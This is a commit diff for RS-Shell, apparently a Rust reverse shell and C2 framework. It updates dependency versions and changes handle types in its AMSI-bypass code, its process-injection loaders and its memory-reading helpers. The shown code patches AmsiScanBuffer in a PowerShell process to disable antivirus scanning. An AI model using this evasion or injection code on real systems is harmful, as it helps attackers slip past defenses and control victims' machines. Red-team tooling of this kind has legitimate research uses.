Dependencies versions update

BlWasp · BlWasp · commit c1b8cb33a6bd · 2024-08-26T22:46:36.000+02:00
diff --git a/Cargo.toml b/Cargo.toml
@@ -6,14 +6,14 @@ edition = "2021"
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 
 [dependencies]
-native-tls = "0.2.11"
+native-tls = "0.2.12"
 signal-hook = "0.3.17"
-regex = "1.10.2"
-open = "5.0.1"
-simple_logger = "4.3.0"
-log = "0.4.20"
-ctrlc = "3.4.1"
-clap = { version = "4.4.11", features = ["derive"] }
+regex = "1.10.6"
+open = "5.3.0"
+simple_logger = "5.0.0"
+log = "0.4.22"
+ctrlc = "3.4.5"
+clap = { version = "4.5.16", features = ["derive"] }
 ntapi = "0.4.1"
 winapi = "0.3.9"
 time = "0.3.36"
@@ -27,7 +27,7 @@ actix-multipart = "0.7.2"
 reqwest = { version = "0.12.7", features = ["blocking", "rustls-tls", "multipart"] }
 
 [dependencies.windows-sys]
-version = "0.52.0"
+version = "0.59.0"
 features = [
     "Win32_System_Memory",
     "Win32_Foundation",
diff --git a/README.md b/README.md
@@ -15,13 +15,13 @@ RS-Shell is reverse shell solution developped in Rust with client, implant and s
 
 RS-Shell implements two modes: **TLS over TCP** and **HTTPS**.
 
-* TLS over TCP mode is a standard reverse shell where the implant executed on the target machine will connect back to the TLS listener, running on the *attacker*'s machine
+* TLS over TCP mode is a standard reverse shell where the implant executed on the target machine will connect back to the TLS listener, running on the operator's machine
 * HTTPS mode works more like a C2 infratructure, with an HTTPS server, an implant, and a client:
     * The HTTPS server is executed on a server accessible by both the implant and the client. It is based on the [Actix](https://actix.rs/) web framework with [Rustls](https://docs.rs/rustls/latest/rustls/)
     * The implant is executed on the target machine and will request the server for "new tasks" every 2 seconds (by default, can be changed in the code for the moment)
-    * The client is executed on the *attacker* machine. It will also connect to the server via HTTPS, and will permit to send the commands to the implant
+    * The client is executed on the operator's machine. It will also connect to the server via HTTPS, and will permit to send the commands to the implant
 
-Windows HTTPS implant is partially proxy aware thanks to the [Windows's WinINet library](https://learn.microsoft.com/fr-fr/windows/win32/wininet/about-wininet). This means that it is able to identify proxy configuration in the registry and automatically authenticate against it if necessary (if the proxy is not configured via the registry or a WPAD file, this will probably fail).
+Windows HTTPS implant is partially proxy aware thanks to the [Windows's WinINet library](https://learn.microsoft.com/fr-fr/windows/win32/wininet/about-wininet). This means that it is able to identify proxy configuration in the registry and automatically authenticate against it if necessary (if the proxy is not configured via the registry or a WPAD file, this will probably fail, and you will have to indicate the proxy URL and the credentials manually in the implant code).
 
 Client, implant and server are all cross-platform and work on Windows and Linux systems.
 
diff --git a/src/amsi_bypass.rs b/src/amsi_bypass.rs
@@ -27,7 +27,7 @@ use syscalls::syscall;
 
 static PATH_REGEX: &str = r#"PS (?<ParentPath>(?:[a-zA-Z]\:|\\\\[\w\s\.\-]+\\[^\/\\<>:"|?\n\r]+)\\(?:[^\/\\<>:"|?\n\r]+\\)*)(?<BaseName>[^\/\\<>:"|?\n\r]*?)> "#;
 
-fn get_scan_buffer(amsiaddr: isize, phandle: isize, syscalls_value: bool) -> isize {
+fn get_scan_buffer(amsiaddr: isize, phandle: *mut c_void, syscalls_value: bool) -> isize {
     let mut status: NTSTATUS;
     let mut buf: [u8; 64] = [0; 64];
 
@@ -66,7 +66,7 @@ fn get_scan_buffer(amsiaddr: isize, phandle: isize, syscalls_value: bool) -> isi
         fill_structure_from_memory(
             &mut nt_head,
             (amsiaddr + dos_head.e_lfanew as isize) as *const c_void,
-            phandle as isize,
+            phandle,
             syscalls_value,
         );
         log::debug!(
@@ -80,7 +80,7 @@ fn get_scan_buffer(amsiaddr: isize, phandle: isize, syscalls_value: bool) -> isi
             &mut exports,
             (amsiaddr + nt_head.OptionalHeader.ExportTable.VirtualAddress as isize)
                 as *const c_void,
-            phandle as isize,
+            phandle,
             syscalls_value,
         );
         log::debug!("Exports: {:#x?}", exports);
@@ -116,7 +116,7 @@ fn get_scan_buffer(amsiaddr: isize, phandle: isize, syscalls_value: bool) -> isi
             let num = u32::from_ne_bytes(nameaddr.try_into().unwrap());
             let funcname = read_from_memory(
                 (amsiaddr + num as isize) as *const c_void,
-                phandle as isize,
+                phandle,
                 syscalls_value,
             );
             if funcname.trim_end_matches('\0') == "AmsiScanBuffer" {
@@ -242,7 +242,7 @@ pub fn patch_amsi(pid: u32, syscalls_value: bool) {
         let mut first_mod = MaybeUninit::<MODULEENTRY32>::uninit().assume_init();
         first_mod.dwSize = std::mem::size_of::<MODULEENTRY32>() as u32;
         Module32First(snap_handle, &mut first_mod as *mut MODULEENTRY32);
-        let _modulname = string_from_array(&mut first_mod.szModule.to_vec());
+        let _modulname = string_from_array(&mut first_mod.szModule.to_vec().iter().map(|&x| x as u8).collect());
         log::debug!("Module name: {:?}", _modulname);
 
         // Search for the amsi.dll module in the PowerShell process memory
@@ -251,7 +251,7 @@ pub fn patch_amsi(pid: u32, syscalls_value: bool) {
             let mut next_mod = MaybeUninit::<MODULEENTRY32>::uninit().assume_init();
             next_mod.dwSize = std::mem::size_of::<MODULEENTRY32>() as u32;
             let res_next = Module32Next(snap_handle, &mut next_mod as *mut MODULEENTRY32);
-            let next_module = string_from_array(&mut next_mod.szModule.to_vec());
+            let next_module = string_from_array(&mut next_mod.szModule.to_vec().iter().map(|&x| x as u8).collect());
             log::debug!("Next module: {:?}", next_module);
 
             if next_module == "amsi.dll" {
@@ -265,7 +265,7 @@ pub fn patch_amsi(pid: u32, syscalls_value: bool) {
 
         log::debug!("Amsi base addr: {:x?}", amsiaddr);
         let mut scanbuffer_addr =
-            get_scan_buffer(amsiaddr, new_handle as isize, syscalls_value) as *mut c_void;
+            get_scan_buffer(amsiaddr, new_handle, syscalls_value) as *mut c_void;
         log::debug!("AmsiScanBuffer base addr: {:x?}", scanbuffer_addr);
 
         // mov rax, 1
@@ -309,15 +309,15 @@ pub fn patch_amsi(pid: u32, syscalls_value: bool) {
             }
         } else {
             WriteProcessMemory(
-                new_handle as isize,
+                new_handle,
                 scanbuffer_addr,
                 patch.as_ptr() as *const c_void,
                 patch.len(),
                 std::ptr::null_mut(),
             );
         }
 
-        CloseHandle(new_handle as isize);
+        CloseHandle(new_handle);
     }
 }
 
diff --git a/src/loader.rs b/src/loader.rs
@@ -292,7 +292,7 @@ pub fn reflective_loader(buf: Vec<u8>) -> Result<(), Box<dyn Error>> {
     Ok(())
 }
 
-fn get_destination_base_addr(prochandle: isize) -> usize {
+fn get_destination_base_addr(prochandle: *mut c_void) -> usize {
     unsafe {
         let mut process_information: PROCESS_BASIC_INFORMATION = std::mem::zeroed();
         let process_information_class = PROCESSINFOCLASS::default();
diff --git a/src/loader_syscalls.rs b/src/loader_syscalls.rs
@@ -860,7 +860,7 @@ pub fn remote_loader_syscalls(buf: Vec<u8>, pe_to_execute: &str) -> Result<(), B
         if !NT_SUCCESS(status) {
             log::debug!("Error resuming thread: {:x}", status);
         }
-        CloseHandle(prochandle as isize);
+        CloseHandle(prochandle);
     }
 
     Ok(())
diff --git a/src/utils/tools_windows.rs b/src/utils/tools_windows.rs
@@ -46,7 +46,7 @@ pub fn fill_structure_from_array<T, U>(base: &mut T, arr: &[U], syscalls_value:
 pub fn fill_structure_from_memory<T>(
     struct_to_fill: &mut T,
     base: *const c_void,
-    prochandle: isize,
+    prochandle: *mut c_void,
     syscalls_value: bool,
 ) {
     unsafe {
@@ -73,7 +73,7 @@ pub fn fill_structure_from_memory<T>(
     }
 }
 
-pub fn read_from_memory(base: *const c_void, prochandle: isize, syscalls_value: bool) -> String {
+pub fn read_from_memory(base: *const c_void, prochandle: *mut c_void, syscalls_value: bool) -> String {
     let mut buf: Vec<u8> = vec![0; 100];
     unsafe {
         if syscalls_value {

Original file line number	Diff line number	Diff line change
`@@ -292,7 +292,7 @@ pub fn reflective_loader(buf: Vec<u8>) -> Result<(), Box<dyn Error>> {`
`292`	`292`	`Ok(())`
`293`	`293`	`}`
`294`	`294`
`295`		`-fn get_destination_base_addr(prochandle: isize) -> usize {`
	`295`	`+fn get_destination_base_addr(prochandle: *mut c_void) -> usize {`
`296`	`296`	`unsafe {`
`297`	`297`	`let mut process_information: PROCESS_BASIC_INFORMATION = std::mem::zeroed();`
`298`	`298`	`let process_information_class = PROCESSINFOCLASS::default();`
Original file line number	Diff line number	Diff line change
`@@ -860,7 +860,7 @@ pub fn remote_loader_syscalls(buf: Vec<u8>, pe_to_execute: &str) -> Result<(), B`
`860`	`860`	`if !NT_SUCCESS(status) {`
`861`	`861`	`log::debug!("Error resuming thread: {:x}", status);`
`862`	`862`	`}`
`863`		`- CloseHandle(prochandle as isize);`
	`863`	`+ CloseHandle(prochandle);`
`864`	`864`	`}`
`865`	`865`
`866`	`866`	`Ok(())`